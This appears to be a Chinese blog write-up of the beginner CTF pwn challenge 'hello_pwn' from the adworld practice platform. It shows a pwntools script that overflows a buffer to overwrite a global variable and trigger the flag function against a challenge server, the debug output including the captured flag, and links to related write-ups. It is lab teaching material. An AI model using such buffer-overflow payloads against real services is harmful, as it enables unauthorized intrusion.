hello_pwn-adworld

最新推荐文章于 2024-07-20 17:00:31 发布
最新推荐文章于 2024-07-20 17:00:31 发布
阅读量203 收藏
点赞数
分类专栏: ctf 笔记 攻防世界CTF 文章标签: ubuntu linux 学习 pwn ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_47210241/article/details/129966393
版权
ctf 同时被 3 个专栏收录
23 篇文章 1 订阅
订阅专栏
攻防世界CTF
23 篇文章 0 订阅
订阅专栏
笔记
19 篇文章 0 订阅
订阅专栏

hello_pwn-adworld

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-q51owmUA-1680659209968)(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAIAAACQkWg2AAAAAXNSR0IArs4c6QAAAERlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAA6ABAAMAAAABAAEAAKACAAQAAAABAAAAEKADAAQAAAABAAAAEAAAAAA0VXHyAAAB+ElEQVQoFS2SuY7CQBBE8XjMYXMfu6wQIgOJCAmRkBAh/pLfICABEUAIIQEJ4hL3bQ4b9rHeDtrTdk11dbWVer2uqqqiuHw+PRwOh0KhYDDo9Xpt297tdpvNZrVaHY/Hx+Pxfr+fz6d0uVw305RSGLpxN80D5e2maZplWefz2YFy5gCRrusSelsoX98/msZZut1u0FLK1+vFJ84ej0dRFErDMOLxuOQR8gdBWBYqXvSlp9P9/hfI4E0ikYjFYslkUqL7er2CAE6GiYwG0zSRQaaP7y9Ap9Pp/wun04mx+AaaQMPlcgHNzUgkggfEZwACW8bjcSaToW61WtFoNJ/Pd7vdWq3G0Aza6/WQQGdIyZJujiFIRN56vT4cDsVisdlscoC4Wq02Gg14P/bYtlgulzDRHUQul0MYJSy8J8MqhPjghKCEUYxGI6cjDnY6nUqlwh7m83kgEKAbL1kfI0GPhGw2K5kdAuxnhul0OhwOgfb7/VKpBBGS2u02ONRjrt/vVyaTyWAwgGy/3zMMZLDSnT7odByHjnUVCoVUKiW32y0/DFohoAl7BQ2CpYGmZCp2x32QaFHL5fJisWAmAm6ggFBMiQwQBAf8JbMcOZvNnGWBwwTWREa64zU6GRoc9x1vJHOwPmTgND7we7E7LsCHTtBw84+AhgJhvzqqhewBzcvrAAAAAElFTkSuQmCC)]GFSJ0465积分 7金币 7

108最佳Writeup由 Aur南风 提供

收藏

反馈

难度:7

方向:Pwn

题解数:47

解出人数:6050

题目来源: CTF

题目描述:

pwn!,segment fault!菜鸡陷入了深思

题目附件: 下载附件

题目场景:

nc 61.147.171.105 61871

100%

倒计时: 31239

延时删除场景

image-20230405094111238

image-20230405094133839

image-20230405094159586

word_60106C == 1853186401

if ( dword_60106C == 0x6E756161 )
sub_400686();

image-20230405094401087

This point can get segment vault!

if ( dword_60106C == 0x6E756161 )
sub_400686();

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
io=remote('61.147.171.105',61871)


pad=4

pause()

#ret_addr=0x0000000000400686
#num
payload=b'A'*pad+'\x61\x61\x75\x6e'

delimiter='for bof'

io.sendlineafter(delimiter,payload)
io.interactive()

#giantbranch@ubuntu:~/Desktop/study$ nc 61.147.171.105 61871  0000000000400686
#~~ welcome to ctf ~~     
#lets get helloworld for bof
#cat flag.txt
#000000000060106C
# if ( dword_60106C == 1853186401 )
#0x6e756161




giantbranch@ubuntu:~/Desktop/study$ python hello_pwn.py
[+] Opening connection to 61.147.171.105 on port 61871: Done
[*] Paused (press any to continue)
[DEBUG] Received 0x36 bytes:
    '~~ welcome to ctf ~~     \n'
    'lets get helloworld for bof\n'
[DEBUG] Sent 0x9 bytes:
    'AAAAaaun\n'
[*] Switching to interactive mode

[DEBUG] Received 0x2d bytes:
    'cyberpeace{05ad515868cb23ffc3b2a6789998d045}\n'
cyberpeace{05ad515868cb23ffc3b2a6789998d045}
[*] Got EOF while reading in interactive
$
32进制
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn学习(1)攻防世界-hello_pwn(大小端存储/ELF文件)
m0_66039322的博客
08-25 286
最后结果: cyberpeace{f178d34680e278da75e4b40e9921da97}查看读入数据和比较数据的位置,会发现问题,他们是挨着的,且相差4个字节,0000000000601068是开始位置,中间的数据随便填充即可。
攻防世界--hello_pwn
Hk_Mayfly的博客
01-13 293
测试文件:https://adworld.xctf.org.cn/media/task/attachments/c0a6dfb32cc7488a939d8c537530174d checksec转自:https://www.cnblogs.com/Ox9A82/p/5728149.html (1)拿到efl,首先要用checksec来检测elf运行于哪个平台,开启了什么安全措施,如果...
pwn 做题记录 2.8 adworld hello_pwn
qq_62423835的博客
02-08 2633
菜鸡的第二篇日记
[攻防世界 pwn]——hello_pwn
Y_peak的博客
02-18 286
[攻防世界 pwn]——hello_pwn15 题目地址: https://adworld.xctf.org.cn/ 题目: checksec IDA, 利用栈溢出修改dword_60106C就好距离为4 exploit from pwn import * #p = process("./pwn") p = remote("111.200.241.244",35304) payload = 'a'*4 + p64(0x6e756161) p.sendline(payload) p.inter
day-6 xctf-hello_pwn
a525024162806525的博客
09-26 381
xctf-hello_pwn 题目传送门:https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=0&id=5052 又是一个溢出,和昨天的有异曲同工之处: 差4个字节,溢出改变dword_60106C的值为nuaa(注意:这里为小端存储,要写为'aa...
adworld-pwn-int_overflow
bunner_的博客
10-16 91
查保护机制NX,查架构32位 扔到IDA中,发现是让你登录,输入用户名,输入密码,再绕过检测即可 所以这里就是控制密码位数,然后在相应位置插入我们的目标地址,使得check_password函数的返回地址为目标地址 目标地址怎么找? 传统艺能[shift+F12] 找到了what_is_this函数,其首地址为0x0804868B 绕过长度限制需要我们的payload的长度为[260, 264] 目标地址填充在哪? dest的首地址为[ebp - 14h] 栈的结构是这样的: 位置 内容
adworld攻防世界-pwn-新手区-wp
令则
03-05 945
adworld-pwn-新手区 tcl 到现在才算是正经昨晚攻防世界的pwn新手区, 整理wp: 题目文件: https://www.jianguoyun.com/p/DSZC7xcQg9bmBxjp5eoC (访问密码:emFwst) 这其中利用到的相关漏洞: 格式化字符串、栈溢出、伪随机数覆盖种子、整数溢出 另外由于自己的exp设置好模板等, 基本都是一个比较大的框架里,每个exp都比较...
adworld-pwn-level0
bunner_的博客
10-16 227
工具:kali + IDA + pwndbg + pwntools 1、将文件扔到IDA中,跟着main函数走找到vulnerable_function 上述可以看出来buf的空间只有0x80B,而_read却读入了0x200B的数据,明显的栈溢出 利用shift+F12查看字符串 发现了这玩意,跟过去发现它被callsystem函数调用 那么,我们接下来的操作就是通过栈溢出让vulnerable_function的返回指令返回到callsystem来 根据vulnerable的汇编代码来看
PWN-入门基础
工作学习笔记
05-27 3793
简单介绍四个方面的内容:一是什么是PWN、二是做PWN所需知识储备、三是基于Ubuntu搭建PWN环境、四是在公网上练习PWN题。
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Out_of_Hand__Attacks_Against_PHP_Environments-Powerful_PHP_Pwn_Primitives.pdf
08-08
当前web应用漏洞变得越来越复杂。对于这些流行网站和应用所用到的底层编程语言和框架的理解程度,对是否能够发现高危漏洞起到重要作用。本议题中,将会深入探讨PHP 7.4的一些最新feature,以及如何利用这些feature去...
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
信息安全_数据安全_hta-t07_modern-exploitation-owni.pdf
08-22
另一方面,年度的PWN2OWN挑战赛展示了黑客如何利用漏洞获取系统的控制权。在2018年的比赛中,总计颁发了超过26万美元的奖金,反映出高级攻击技术的繁荣。这种公开的竞争环境推动了漏洞利用技术的进步,同时也提醒...
Ubuntu的SELinux
qq_33373173的博客
07-16 392
Ubuntu的SELinux
vscode 远程 Ubuntu 系统
最新发布
mantouyouyou的博客
07-20 191
3、打开远程窗口,选择“Connect to Host”功能,选择“Add New SSH Host”功能。2、首先打开 Windows 下的 vscode,点击左下角图标打开远程窗口。1、在 Ubuntu 下检查 sshd 守护进程是否开启。如果没有开启,请在 Ubuntu 下输入指令安装。4、输入远程电脑的用户名和 IP 地址。5、输入连接命令后,按回车键。
Ubuntu22.04版本的YOLOv8TensorRT模型部署
qq_53545309的博客
07-19 1100
如何使用代码导出onnx文件。你将会的到例如:yolov8n.trt、yolov8s.trt、yolov8m.trt等文件。yaml是官方提供的配置文件,如果是自己训练的模型,那就设置为自定义yaml文件即可。
解决Ubuntu 20.04下外接显示屏无信号问题【多次尝试无坑完整版!!!】
举个栗子的博客
07-17 606
终于终于解决了这个问题,虽然一开始觉得问题不大,但它确实困扰了我很久。今天终于抽出时间彻底解决了它,现在又可以快乐地使用外接显示屏了!在寻找解决方法的过程中,我发现很多帖子只讲到了更换驱动,但其实后续还需要完成一些配置。相信有不少同学也需要外接显示屏来学习和工作,所以我想记录一下这个过程,希望能给大家提供一些帮助和启发。有什么问题欢迎大家评论区沟通!!!
xdctf2015_pwn200
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值